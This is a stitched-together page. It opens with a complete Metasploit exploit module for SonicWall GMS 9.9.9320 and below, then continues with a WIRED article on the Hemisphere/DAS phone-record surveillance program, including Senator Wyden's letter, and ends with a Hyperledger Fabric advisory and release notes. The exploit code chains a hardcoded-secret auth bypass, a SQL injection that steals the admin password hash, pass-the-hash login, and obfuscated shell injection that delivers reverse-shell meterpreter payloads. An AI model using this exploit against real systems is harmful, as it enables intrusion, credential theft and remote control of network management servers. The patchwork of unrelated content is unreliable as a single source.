This Metasploit module exploits a series of vulnerabilities - including auth bypass, SQL injection, and shell injection - to obtain remote code execution on SonicWall GMS versions 9.9.9320 and below.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html  # We can actually use the title to identify which platform we're on  TITLE_WINDOWS = 'SonicWall Universal Management Host'  TITLE_LINUX = 'SonicWall Universal Management Appliance'  # Secret key (from com.sonicwall.ws.servlet.auth.MSWAuthenticator)  SECRET_KEY = '?~!@#$%^^()'  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Sonicwall',        'Description' => %q{          This module exploits a series of vulnerabilities - including auth          bypass, SQL injection, and shell injection - to obtain remote code          execution on SonicWall GMS versions <= 9.9.9320.        },        'License' => MSF_LICENSE,        'Author' => [          'fulmetalpackets <fulmetalpackets@gmail.com>', # MSF module, analysis          'Ron Bowes <rbowes@rapid7.com>' # MSF module, original PoC, analysis        ],        'References' => [          [ 'URL', 'https://www.rapid7.com/blog/post/2023/07/13/etr-sonicwall-recommends-urgent-patching-for-gms-and-analytics-cves/'],          [ 'CVE', '2023-34124'],          [ 'CVE', '2023-34133'],          [ 'CVE', '2023-34132'],          [ 'CVE', '2023-34127']        ],        'Privileged' => true,        'Targets' => [          [            'Linux Dropper',            {              'Platform' => ['linux'],              'Arch' => [ARCH_X64],              'Type' => :dropper,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',                'WritableDir' => '/tmp'              }            }          ],          [            'Windows Command',            {              'Platform' => ['win'],              'Arch' => [ARCH_CMD],              'Type' => :cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp',                'WritableDir' => '%TEMP%'              }            }          ],          [            'Linux Command',            {              'Platform' => ['linux', 'unix'],              'Arch' => [ARCH_CMD],              'Type' => :cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/generic'              }            }          ],        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-07-12',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK]        },        'DefaultOptions' => {          'SSL' => true,          'RPORT' => '443'        }      )    )    register_options(      [        OptString.new('TARGETURI', [ true, 'The root URI of the Sonicwall appliance', '/']),      ]    )    register_advanced_options([      # This varies by target, so don't define the default here      OptString.new('WritableDir', [true, 'A directory where we can write files']),    ])  end  def check    vprint_status("Validating SonicWall GMS is running on URI: #{target_uri.path}")    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path),      'method' => 'GET'    )    # Basic sanity checks - the path should return a HTTP/200    return CheckCode::Unknown('Could not connect to web service - no response') if res.nil?    return CheckCode::Unknown("Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200    # Ensure we're hitting plausible software    return CheckCode::Detected("Running: #{::Regexp.last_match(1)}") if res.body =~ /(SonicWall Universal Management Suite [^<]+)</    # Otherwise, probably safe?    CheckCode::Safe('Does not appear to be running SonicWall GMS')  end  # Exploits CVE-2023-34133 (SQL injection) + CVE-2023-34124 (auth bypass) to  # get a password hash  def get_password_hash    # attempt a sqli.    vprint_status('Attempting to use SQL injection to grab the password hash for the superadmin user...')    # SQL injection question to fetch the admin password    query = "' union select " +            # This must be a valid DOMAIN, which we can thankfully fetch from the DB            '(select ID from SGMSDB.DOMAINS limit 1), ' +            # These fields don't matter            "'', '', '', '', '', " +            # This field is returned, so use it to get the id and password for our            # the super user, if possible            "(select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0)," +            # The rest of the fields don't matter, end with a single quote to finish with a clean query            "'', '', '"    vprint_status("Generated SQL injection: #{query}")    # We need to sign our query with the SECRET_KEY    token = Base64.strict_encode64(OpenSSL::HMAC.digest(OpenSSL::Digest.const_get('SHA1').new, SECRET_KEY, query))    vprint_status("Generated a token using built-in secret key: #{token}")    # Build the URI    # Note that encoding space to '+' doesn't work, so we replace it with '%20'    uri = normalize_uri(target_uri.path, 'ws/msw/tenant', CGI.escape(query).gsub(/\+/, '%20'))    # Do it!    print_status('Sending SQL injection request to get the username/hash...')    res = send_request_cgi(      'method' => 'GET',      'uri' => uri,      'headers' => {        'Auth' => '{"user": "system", "hash": "' + token + '"}'      }    )    # Sanity checks    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?    fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code: #{res.code}") if res.code != 200    fail_with(Failure::UnexpectedReply, "Service didn't return a JSON response") if res.get_json_document.empty?    # This field has the SQL injection response    hash = res.get_json_document['alias']    # If the server responds with an error, it has no 'alias' field so the key    # is missing entirely (this is where it fails against patched targets)    fail_with(Failure::NotVulnerable, "SQL injection failed - service probably isn't vulnerable (or isn't configured)") if hash.nil?    # If alias is present but contains nothing, that means our query got no    # results (probably there are no active users, or something?)    fail_with(Failure::UnexpectedReply, 'SQL injection appeared to work, but no users returned - server might not have an admin account?') if hash.empty?    # If there's no ':' in the response, something super weird happened    fail_with(Failure::UnexpectedReply, 'SQL injection returned the wrong value: no username or hash') if !hash.include?(':')    username, hash = hash.split(/:/, 2)    print_good("Found an account: #{username}:#{hash}")    [username, hash]  end  # Exploits CVE-2023-34132 (pass the hash)  def authenticate(username, hash)    # Grab server hashing token    vprint_status('Grabbing server hashing token...')    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/appliance/login'),      'keep_cookies' => true    )    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?    # Look for the getPwdHash function call, as it contains the token we need    if res.body.match(/getPwdHash.*,'([0-9]+)'/).nil?      fail_with(Failure::UnexpectedReply, 'Could not get the server token for authentication')    end    server_token = ::Regexp.last_match(1)    vprint_status("Got the server-side token: #{server_token}")    # Generate the client_hash by combining the server token + the stolen    # password hash    client_hash = Digest::MD5.hexdigest(server_token + hash)    vprint_status("Generated client token: #{client_hash}")    # Send the token    print_status('Attempting to authenticate with the client token + password hash...')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),      'keep_cookies' => true,      'vars_post' => {        'action' => 'login',        'clientHash' => client_hash,        'applianceUser' => username      }    })    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?    # Check the title to make sure it worked    html = res.get_html_document    title = html.at('title').text    # We can identify the platform based on the title    if title == TITLE_LINUX      print_good("Successfully logged in as #{username} (Linux detected!)")      return Msf::Module::Platform::Linux    elsif title == TITLE_WINDOWS      print_good("Successfully logged in as #{username} (Windows detected!)")      return Msf::Module::Platform::Windows    end    fail_with(Failure::UnexpectedReply, "Authentication appears to have failed! Title was \"#{title}\", which is not recognized as successful")  end  def execute_command_windows(cmd)    vprint_status("Encoding (Windows) command: #{cmd}")    # While this is a shell command injection issue, an aggressive XSS filter    # prevents us from using a lot of important characters such as quotes and    # plus and ampersands and stuff. We can't even use Base64, because we can't    # use the + sign!    #    # We discovered that we could encode the command as integers, then use    # powershell to decode + execute it, so that's what this does.    cmd = "cmd.exe /c #{Msf::Post::Windows.escape_powershell_literal(cmd).gsub(/&/, '"&"')}"    encoded_cmd = "powershell IEX ([System.Text.Encoding]::UTF8.GetString([byte[]]@(#{cmd.bytes.join(',')})))"    # Run the command    vprint_status("Running shell command: #{cmd}")    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),      'keep_cookies' => true,      'vars_post' => {        'action' => 'file_system',        'task' => 'search',        'searchFolder' => 'C:\\GMSVP\\etc\\',        'searchFilter' => "|#{encoded_cmd}| rem "      }    })    # This doesn't work, because our payload blocks and it eventually fails    fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.empty?    fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res.body.include?('invalid contents found')    print_good('Payload sent!')  end  def execute_command_linux(cmd)    vprint_status('Encoding (Linux) payload')    # Generate a filename    payload_file = File.join(datastore['WritableDir'], ".#{Rex::Text.rand_text_alpha_lower(8)}")    # Wrap the command so we can execute arbitrary commands. There are several    # difficulties here, the first of which is that we don't have much in the    # way of tools. We're missing curl, wget, base64, python, ruby, even perl!    # The best tool I could find for staging a payload is uudecode, so we use    # that. (I noticed later that telnet exists, which could be another option)    #    # The good news is, with uudecode, we can send a base64 payload. The bad    # news is, we can't use '+', which means we can't use pure base64! To work    # around that, we replace '+' with '@', then use a bit of Bash magic to    # put it back! We also can't use quotes, so we have to do a mountain of    # escaping instead. The default shell is also /bin/sh, so we need to run    # bash explicitly for the `$()` substitutions to work.    cmd = [      # Build a command that runs in bash (but don't use quotes!)      'bash -c ',      # Escape all this for bash      Shellwords.escape([        # Use `uudecode` to get a '+' into a variable        "PLUS=$(echo -e begin-base64\ 755\ a\\\\nKwee\\\\n==== | uudecode -o-);",        # Build a new uuencode file (encoded in base64) with the payload        "echo -e begin-base64 755 #{Shellwords.escape(payload_file)}\\\\n",        # Encode the payload as base64, but replace + with a variable        "#{Base64.strict_encode64(cmd).gsub(/\+/, '${PLUS}')}\\\\n",        # Pipe into uudecode        '==== | uudecode;',        # Run in the background with coproc        "coproc #{Shellwords.escape(payload_file)};",        # Delete the payload file        "rm #{payload_file}"      ].join)    ].join    # Run it!    vprint_status("Encoded shell command: #{cmd}")    print_status('Attempting to execute the shell injection payload')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),      'keep_cookies' => true,      'vars_post' => {        'action' => 'file_system',        'task' => 'search',        'searchFolder' => '/opt/GMSVP/etc/',        'searchFilter' => ";#{cmd}#"      }    })    # This doesn't work, because our payload blocks and it eventually fails    fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.empty?    fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res.body.include?('invalid contents found')    print_good('Payload sent!')  end  def exploit    # Get the password hash (from SQL injection + auth bypass)    username, hash = get_password_hash    # Use pass-the-hash to log in using that hash    detected_platform = authenticate(username, hash)    # Sanity-check the target    if !datastore['ForceExploit'] && !target.platform.platforms.include?(detected_platform)      fail_with(Failure::BadConfig, "The host appears to be #{detected_platform}, which the target #{target.name} does not support; please choose the appropriate target (or set ForceExploit to true)")    end    # Generate a payload based on the target type    case target['Type']    when :cmd      my_payload = payload.encoded    when :dropper      my_payload = generate_payload_exe    else      fail_with(Failure::BadConfig, "Unknown target type: #{target.type}")    end    # Run a command, using the platform specified in the target    if target.platform.platforms.include?(Msf::Module::Platform::Linux)      execute_command_linux(my_payload)    elsif target.platform.platforms.include?(Msf::Module::Platform::Windows)      execute_command_windows(my_payload)    else      fail_with(Failure::Unknown, "Unknown platform: #{platform}")    end  endend

Sonicwall GMS 9.9.9320 Remote Code Execution

A WIRED analysis of leaked police documents verifies that a secretive government program is allowing federal, state, and local law enforcement to access phone records of Americans who are not suspected of a crime.

A little-known surveillance program tracks more than a trillion domestic phone records within the United States each year, according to a letter WIRED obtained that was sent by US senator Ron Wyden to the Department of Justice (DOJ) on Sunday, challenging the program’s legality.

According to the letter, a surveillance program now known as Data Analytical Services (DAS) has for more than a decade allowed federal, state, and local law enforcement agencies to mine the details of Americans’ calls, analyzing the phone records of countless people who are not suspected of any crime, including victims. Using a technique known as chain analysis, the program targets not only those in direct phone contact with a criminal suspect but anyone with whom those individuals have been in contact as well.

The DAS program, formerly known as Hemisphere, is run in coordination with the telecom giant AT&T, which captures and conducts analysis of US call records for law enforcement agencies, from local police and sheriffs’ departments to US customs offices and postal inspectors across the country, according to a White House memo reviewed by WIRED. Records show that the White House has, for the past decade, provided more than $6 million to the program, which allows the targeting of the records of any calls that use AT&T’s infrastructure—a maze of routers and switches that crisscross the United States.

In a letter to US attorney general Merrick Garland on Sunday, Wyden wrote that he had “serious concerns about the legality” of the DAS program, adding that “troubling information” he’d received “would justifiably outrage many Americans and other members of Congress.” That information, which Wyden says the DOJ confidentially provided to him, is considered “sensitive but unclassified” by the US government, meaning that while it poses no risk to national security, federal officials, like Wyden, are forbidden from disclosing it to the public, according to the senator’s letter.

AT&T spokesperson Kim Hart Jonson declined WIRED’s request to comment on the DAS program, saying only that the company is required by law to comply with a lawful subpoena.

There is no law requiring AT&T to store decades’ worth of Americans’ call records for law enforcement purposes. Documents reviewed by WIRED show that AT&T officials have attended law enforcement conferences in Texas as recently as 2018 to train police officials on how best to utilize AT&T’s voluntary, albeit revenue-generating, assistance.

In 2020, the transparency collective Distributed Denial of Secrets published hundreds of gigabytes of law enforcement data stolen from agencies around the US. A WIRED review of the files unearths extraordinary detail regarding the processes and justifications that agencies use to monitor the call records of not only criminal suspects, but of their spouses, children, parents, and friends. While DAS is managed under a program devoted to drug trafficking, a leaked file from the Northern California Regional Intelligence Center (NCRIC) shows that local police agencies, such as those in Daly City and Oakland, requested DAS data for unsolved cases seemingly unrelated to drugs.

In one instance, an officer with the Oakland Police Department asked for a “Hemisphere analysis” to identify the phone number of a suspect by analyzing the calls of the suspect’s close friends. In another, a San Jose law enforcement officer asked the Northern California Regional Intelligence Center to identify a victim and material witness in an unspecified case. One officer, soliciting information from AT&T under the program, wrote: “We obtained six months of call data for \[suspect\]'s phone, as well as several close associations (his girlfriend, father, sister, mother).” The records do not indicate how AT&T responds to every request.

Leaked law enforcement files further show that a range of officials—from a US Postal Service inspector to a New York Department of Corrections parole officer—participated in DAS training sessions. Other participants include port authorities and members of US Immigration & Customs Enforcement, National Guard, and California Highway Patrol, alongside scores of smaller agencies.

First disclosed by _The New York Times_ in September 2013 as Hemisphere, the DAS program—renamed in 2013—has since flown largely under the radar. Internal records concerning the program’s secrecy that were obtained by the newspaper at the time show that law enforcement had long been instructed to never “refer to Hemisphere in any official document.”

Following the _Times_’ story, former US president Barack Obama reportedly suspended funding for the Hemisphere program in 2013. And while discretionary funding was withheld over the following three years, a White House memo obtained by WIRED shows that individual law enforcement organizations across the US were permitted to continue contracting with AT&T directly in order to maintain access to its data-mining service. Funding resumed under former president Donald Trump but was halted again in 2021, according to the White House memo. Last year, under president Joe Biden, the funding resumed once more, the memo says.

The White House acknowledged an inquiry from WIRED but has yet to provide a comment.

The DAS program is maintained under an affiliated program called HIDTA, funded by the White House’s Office of National Drug Control Policy (ONDCP). HIDTA, or “high-intensity drug trafficking area,” is a designation assigned to 33 different regions of the US, according to the White House. The first five regions, mapped out in 1990, included areas around Los Angeles, Houston, Miami, New York, and the entire US-Mexico border, some of the nation’s most active drug trafficking areas.

The collection of call record data under DAS is not wiretapping, which on US soil requires a warrant based on probable cause. Call records stored by AT&T do not include recordings of any conversations. Instead, the records include a range of identifying information, such as the caller and recipient’s names, phone numbers, and the dates and times they placed calls, for six months or more at a time. Documents released under public records laws show the DAS program has been used to produce location information on criminal suspects and their known associates, a practice deemed unconstitutional without a warrant in 2018.

“Requests concerning location information require the highest level of legal demand, which is a court-issued warrant, except in emergency situations,” AT&T’s Hart Jonson says.

Orders targeting a nexus of individuals are sometimes called “community of interest” subpoenas, a phrase that among privacy advocates is synonymous with dragnet surveillance.

“The scale of the data available to and routinely searched for the benefit of law enforcement under the Hemisphere Project is stunning in its scope,” Wyden’s letter to Garland says.

The White House has provided at least $6.1 million in discretionary funding to the DAS program since 2013, according to a two-page memo authored last year by White House officials. An internal HIDTA “participant guide” reviewed by WIRED shows that HIDTA funding exceeded $280 million in 2020 alone. It remains unclear how much HIDTA funding is spent to support AT&T’s vast collection of American call records.

It is not currently known how far back the call records accessible under DAS go. A slide deck released under the Freedom of Information Act in 2014 states that up to 10 years’ worth of records can be queried under the program, a statistic that contrasts with other internal documents that claimed AT&T could reach decades into the past. AT&T’s competitors, meanwhile, typically retain call records for no more than two years. (The necessity for phone companies to track call records for extended periods of time has gradually decreased with the disappearance of long-distance charges.)

The DAS program echoes multiple dragnet surveillance programs dating back decades, including a Drug Enforcement Agency program launched in 1992 that forced phone companies to surrender records of virtually all calls going to and from over 100 other countries; the National Security Agency’s bulk metadata collection program, which the US Second Circuit Court of Appeals deemed illegal in 2014; and the Call Details Records program, which suffered from “technical irregularities” leading the NSA to collect millions of calls it was “not authorized to receive.”

Unlike these past programs, which were subject to congressional oversight, DAS is not. A senior Wyden aide tells WIRED the program takes advantage of numerous “loopholes” in federal privacy law. The fact that it’s effectively run out of the White House, for example, means it is exempt from rules requiring assessments of its privacy impacts. The White House is also exempt from the Freedom of Information Act, reducing the public’s overall ability to shed light on the program.

Because AT&T’s call record collection occurs along a telecommunications “backbone,” protections enshrined under the Electronic Communications Privacy Act may not apply to the program.

Earlier this month, Wyden and other lawmakers in the House and Senate introduced comprehensive privacy legislation known as the Government Surveillance Reform Act. The bill contains numerous provisions that, if enacted, would patch most if not all of these loopholes, effectively rendering the DAS program, in its current form, explicitly illegal.

Read Wyden’s full letter to the US Department of Justice below:

_The Honorable Merrick B. Garland_  
_Attorney General_  
_U.S. Department of Justice_  
_950 Pennsylvania Avenue, NW_  
_Washington, DC 20530-0001_

_Dear Attorney General Garland:_

_I write to request that you clear for public release additional information about the Hemisphere Project. This is a long-running dragnet surveillance program in which the White House pays AT&T to provide all federal, state, local, and Tribal law enforcement agencies the ability to request often-warrantless searches of trillions of domestic phone records._

_In 2013, the New York Times revealed the existence of a surveillance program in which the White House Office of National Drug Control Policy (ONDCP) pays AT&T to mine its customers’ records for the benefit of federal, state, local, and Tribal law enforcement agencies. According to an ONDCP slide deck, AT&T has kept and queries as part of the Hemisphere Project call records going back to 1987, with 4 billion new records being added every day. That slide deck was apparently disclosed by a local law enforcement agency in response to a public information request and was published by the New York Times in 2013._

_The scale of the data available to and routinely searched for the benefit of law enforcement under the Hemisphere Project is stunning in its scope. One law enforcement official described the Hemisphere Project as “AT&T's Super Search Engine” and ... "Google on Steroids,” according to emails released by the Drug Enforcement Administration (DEA) under the Freedom of Information Act. The ONDCP slide deck and an email released by the DEA also reveal that AT&T searches records kept by its wholesale division, which carries communications on behalf of other communications companies and their customers. Another slide deck released by ONDCP and published by the press in 2014 describes the specific capabilities of Hemisphere, including that it can be used to identify alternate numbers used by a target, obtain location data and “two levels of call detail records for one target number” (meaning the phone records of everyone who communicated with the target)._

_The Hemisphere Project has been supported by regular funding from the White House ONDCP since 2009, according to the attached undated white paper that ONDCP provided to my office on October 27, 2022 (Appendix A). That same document reveals that White House funding for this program was suspended by the Obama Administration in 2013, the same year the program was exposed by the press, but continued with other federal funding under a new generic sounding program name, “Data Analytical Services.” ONDCP funding for this surveillance program was quietly resumed by the Trump Administration in 2017, paused again in 2021, the first year of the Biden Administration, and then quietly restarted again in 2022._

_Although the Hemisphere Project is paid for with federal funds, they are delivered to AT&T through an obscure grant program, enabling the program to skip an otherwise mandatory federal privacy review. If the funds came directly from a federal agency, such as the DEA, Hemisphere would have been subjected to a mandatory Privacy Impact Assessment conducted by the Department of Justice (DOJ) Office of Privacy and Civil Liberties, the findings of which would be made public. Instead, ONDCP provides funding for the program through the Houston High Intensity Drug Trafficking Area (HIDTA), one of 33 regional funding organizations as a part of a grant program created by Congress and administered by ONDCP. The HIDTAs distribute federal anti-drug law enforcement grants to state and local agencies, and are governed by a board made up entirely of federal, state and local law enforcement officials._

_ONDCP provided my staff with an undated white paper describing the program and its historical funding levels, but ONDCP directed all questions about Hemisphere to the Houston HIDTA. Officials at the Houston HIDTA provided my office with a briefing on November 7, 2022, and spoke again with my staff again by phone on December 1, 2022. The Houston HIDTA officials told my staff that all Hemisphere requests are sent to a single AT&T analyst located in Atlanta, Georgia, and that any law enforcement officer working for one of the federal, state, local and Tribal law enforcement agencies in the U.S. can contact the AT&T Hemisphere analyst directly to request they run a query, with varying authorization requirements. The Houston HIDTA officials confirmed that Federal and state law enforcement agencies can request a Hemisphere search with a subpoena, which is a directive that many law enforcement agencies can issue themselves (except in California and Texas, where a court order is required by state law). They also explained that Hemisphere searches are not required to be in support of drug-related investigations._

_For the past year, I have urged the DOJ to release dozens of pages of material related to the Hemisphere Project, which it first provided to my office in 2019. This information has been designated “Law Enforcement Sensitive,” which is meant to restrict its public release. I have serious concerns about the legality of this surveillance program, and the materials provided by the DOJ contain troubling information that would justifiably outrage many Americans and other members of Congress. While I have long defended the government’s need to protect classified sources and methods, this surveillance program is not classified and its existence has already been acknowledged by the DOJ in federal court. The public interest in an informed debate about government surveillance far outweighs the need to keep this information secret. To that end, I urge you to promptly clear for public release the material described in Appendix B._

_Thank you for your attention to this important matter._

_Sincerely,_

_Ron Wyden_  
_United States Senator_

Secretive White House Surveillance Program Gives Cops Access to Trillions of US Phone Records

Hyperledger Fabric is a permissioned distributed ledger framework. In affected versions if a consensus client sends a malformed consensus request to an orderer it may crash the orderer node. A fix has been added in commit 0f1835949 which checks for missing consensus messages and returns an error to the consensus client should the message be missing. Users are advised to upgrade to versions 2.2.7 or v2.4.5. There are no known workarounds for this issue.


**v2.2.7 Release Notes - July 1, 2022****Fixes**

**orderer - Handle malformed consensus request**

If a consensus client sends a malformed consensus request to an orderer it may crash the orderer node.  
This fix checks for the malformed consensus request and returns an error to the consensus client.

**Dependencies**

Fabric v2.2.7 has been tested with the following dependencies:

*   Go 1.18.2
*   CouchDB v3.2.2

Fabric docker images on dockerhub utilize Alpine 3.16.

**Deprecations (existing)**

**FAB-15754: The 'Solo' consensus type is deprecated.**

The 'Solo' consensus type has always been marked non-production and should be in  
use only in test environments, however for compatibility it is still available,  
but may be removed entirely in a future release.

**FAB-16408: The 'Kafka' consensus type is deprecated.**

The 'Raft' consensus type was introduced in v1.4.1 and has become the preferred  
production consensus type. There is a documented and tested migration path from  
Kafka to Raft, and existing users should migrate to the newer Raft consensus type.  
For compatibility with existing deployments, Kafka is still supported,  
but may be removed entirely in a future release.  
Additionally, the fabric-kafka and fabric-zookeeper docker images are no longer updated, maintained, or published.

**Fabric CouchDB image is deprecated**

v2.2.0 added support for CouchDB 3.1.0 as the recommended and tested version of CouchDB.  
If prior versions are utilized, a Warning will appear in peer log.  
Note that CouchDB 3.1.0 requires that an admin username and password be set,  
while this was optional in CouchDB v2.x. See the  
Fabric CouchDB documentation  
for configuration details.  
Also note that CouchDB 3.1.0 default max\_document\_size is reduced to 8MB. Set a higher value if needed in your environment.  
Finally, the fabric-couchdb docker image will not be updated to v3.1.0 and will no longer be updated, maintained, or published.  
Users can utilize the official CouchDB docker image maintained by the Apache CouchDB project instead.

**FAB-7559: Support for specifying orderer endpoints at the global level in channel configuration is deprecated.**

Utilize the new 'OrdererEndpoints' stanza within the channel configuration of an organization instead.  
Configuring orderer endpoints at the organization level accommodates  
scenarios where orderers are run by different organizations. Using  
this configuration ensures that only the TLS CA certificates of that organization  
are used for orderer communications, in contrast to the global channel level endpoints which  
would cause an aggregation of all orderer TLS CA certificates across  
all orderer organizations to be used for orderer communications.

**FAB-17428: Support for configtxgen flag --outputAnchorPeersUpdate is deprecated.**

The --outputAnchorPeersUpdate mechanism for updating anchor peers has always had  
limitations (for instance, it only works the first time anchor peers are updated).  
Instead, anchor peer updates should be performed through the normal config update flow.

**FAB-15406: The fabric-tools docker image is deprecated**

The fabric-tools docker image will not be published in future Fabric releases.  
Instead of using the fabric-tools docker image, users should utilize the  
published Fabric binaries. The Fabric binaries can be used to make client calls  
to Fabric runtime components, regardless of where the Fabric components are running.

**FAB-15317: Block dissemination via gossip is deprecated**

Block dissemination via gossip is deprecated and may be removed in a future release.  
Fabric peers can be configured to receive blocks directly from an ordering service  
node by using the following configuration:

    peer.gossip.orgLeader: true
    peer.gossip.useLeaderElection: false
    peer.gossip.state.enabled: false
    peer.deliveryclient.blockGossipEnabled: false
    

**FAB-15061: Legacy chaincode lifecycle is deprecated**

The legacy chaincode lifecycle from v1.x is deprecated and will be removed  
in a future release. To prepare for the eventual removal, utilize the v2.x  
chaincode lifecycle instead, by enabling V2\_0 application capability on all  
channels, and redeploying all chaincodes using the v2.x lifecycle. The new  
chaincode lifecycle provides a more flexible and robust governance model  
for chaincodes. For more details see the  
documentation for enabling the new lifecycle.

**Changes:**

*   7f22e99 Release commit for v2.2.7 (#3504)
*   80bcc18 Check if inner consensus message is missing
*   e7dc57d Release commit for v2.2.6 (#3488)
*   862ab4d Add logging for identity, policy, and signature troubleshooting (release-2.2) (#3483) \[ #3006 \]
*   b7aaeb8 Fix gossip unit test flake (#3215)
*   2dc7d5c Bump Alpine to 3.16 (release-2.2) (#3473)
*   2d286f1 Fixed Found Typos
*   b24f2c0 Add -buildvcs=false for building binaries
*   dd3e96e Update 'Using Private Data in Fabric' tutorial (Backport #1875)
*   61561dd bump Go to 1.18.2 (release-2.2)

**See More**

*   b17d01a bump golang.org/x/crypto and golang.org/x/tools (release-2.2) (#3436)
*   21e522b bump go-dockerclient (release-2.2) (#3435) \[ #2338 \]
*   df783d6 Remove duplicated line
*   eabe68b Fix some errors in the tutorial
*   4f61890 Bump CouchDB to 3.2.2 (release-2.2)
*   8be2067 Fix mistake change 'curl' to 'git'
*   2deacba Fix doc to handle $PWD containing whitepaces
*   6a1071e Update README build badge link
*   fa43e61 Update links for Jira to GitHub issue transition in README
*   4b1bfbf Update boostrap.sh for test network
*   e728001 Update documentation to include Go SDK
*   449ef0a Fix link to security bug reporting process (#2160)
*   2f4eb7f Update "master" branch references to "main".
*   09393f6 Update chaincode language parameter name
*   ed67dbe Fix hyperlink
*   61d5840 Fix warning log printing
*   578a648 Properly handle concurrent building of chaincode packages
*   cfbb980 Documentation: Update network (Key Concepts) page
*   0d79dd2 certs mgmt guide (#3307)
*   0132f2a Additional TLS troubleshooting information (#3346)
*   4ab9059 Ignore channel double creation during replication. \[ #2931 \]
*   e2f05e6 Ignore expired CA/TLS CA certs on msp init (#3238) (#3249) (#3255)
*   68b6b90 Fix FAB-18528: remove panic in ifConfig func (#2828)
*   f7318ff Release commit for v2.2.5
*   c04cd7d Bump Go to 1.17.5 (release-2.2) (#3186)
*   4996e82 - Fix failure to generate all possible combinations (backport #3132) (#3150)
*   162f867 Add Information about AWS HSM
*   fcdc0b5 Backport setEvent information to 2.2 \[ #2958 \]
*   acf88a0 \[Backport\] #2936 to release-2.2 (#2953)
*   eddb470 Unit test flake when rpc server stream not closed (backport #2935) (#2942)
*   19a137b Fix broken links for international workgroups (#2920)
*   2088b5f Update docs for Jira to GitHub issue transition
*   263ca9e Release commit for v2.2.4 (#2901)
*   029e6ed Fixed a typo in private\_data\_tutorial
*   1eedcff Update Go to v1.16.7 and alpine to 3.14 (release-2.2)
*   851f838 Fix process termination waits in health tests (#2889)
*   e6a6a61 platform/golang: loosen assertion for Go 1.16.2 (release-2.2)
*   ba2a9f1 deps: bump testify (release-2.2) (#2886) \[ #2336 \]
*   50064c8 Update x509.CertPool equality checks (#2880)
*   f441ba2 Change name of test network docker network in 2.2
*   859c7d5 Clean up Go modules (release-2.2) (#2876)
*   07ac9f5 Stop spamming for wait channel acquirement in orderer integration test
*   b076bd7 Options for GRPC message size configurable
*   c91b546 Change name of comm msg size default consts
*   da9e1bd Refactor max message sizes in comm client config
*   fbf7b93 FAB18529 added nil check in channel header parsing
*   9a6b351 Additional documentation for implicit private data collections
*   8fd2ad8 \[FAB-18509\] Stop panic of collection index path is wrong (#2726) (#2744)
*   62c68d1 Updated enrollUser function in write\_first\_app Doc (#2713)
*   a0dcb5c Update docs to clarify that an implicit collection can not have an index
*   2f7fd17 Fixed grammatical errors
*   f36fe03 \[Doc-Update\] + What is a commercial paper section
*   8b1d355 Fix a typo in CouchDB tutorial
*   4c77749 Fix typo
*   f3f170f Fix peerchaincode.md as well
*   30a0931 Add explanation of --ctor JSON string
*   b926247 Clarify orderers seeing the transaction data
*   f4feedb Cherry pick deploy CC fixes into release-2.2
*   68bc522 Clarify "identity expired" error messages (#2685) (#2688)
*   3a69034 Fix spelling mistakes in the Github Contributions page
*   ccecf10 \[FAB-18484\] Return transaction forwarding result back to the client synchronously
*   7e61944 \[FAB-18487\] Update broken link in 2.2 branch
*   186d9bf Typo fix in peer deployment guide in main (#2660)
*   31e41ce Update private\_data\_tutorial.rst
*   4cb453e Fix jq commands in create channel tutorial (#2662)
*   8851da3 Back port 2023 - skip empty ledge and 2635 - RetrieveBlockByNumber (#2648) \[ #2023, #2635 \]
*   cc50451 Clarify doc for readset validations (#2647) (#2655)
*   3548215 Update secured\_private\_asset\_transfer\_tutorial.md
*   56b3689 \[FAB-18479\] Log error if orderer can't forward SubmitRequest to Raft leader
*   dd7e921 fix duplicate entry in code snippet
*   7871c26 Optionally disable gossip block forwarding (#2606)
*   bce75cf Update docs/source/upgrade\_to\_newest\_version.md
*   678523b Govendor added to documentation
*   26b45ca Deploy a chaincode to new channel command issue
*   3f2158a Improve error message for invalid consenter cert (#2587)
*   94ace65 v2.2.3 release commit
*   d272122 Cherry pick removing duplicate word (#2523)
*   222fbc8 Add Security Model topic to docs
*   8116872 Fix link in international_languages.md
*   496c5f5 integration: PKCS#11 SKI to CKA\_ID mapping test
*   d2d031e pkcs11: Add SKI to CKA\_ID mapping for BCCSP \[ #11 \]
*   7214be7 Prevent race that occurs after test timeout
*   6adcbce integration: backport chaincode\_server\_test
*   8843223 Back-fill tests for externalbuilder.Duration
*   796f760 This commit upgrades goleveldb. This upgraded version includes a fix for \[ #2463 \]
*   fae13c3 Report correct reason of stream abort in orderer cluster
*   2b2e154 Log stream total lifetime
*   100a7e7 corrected organization labels
*   6320aed corrected Org1 text in Org2 box to Org2
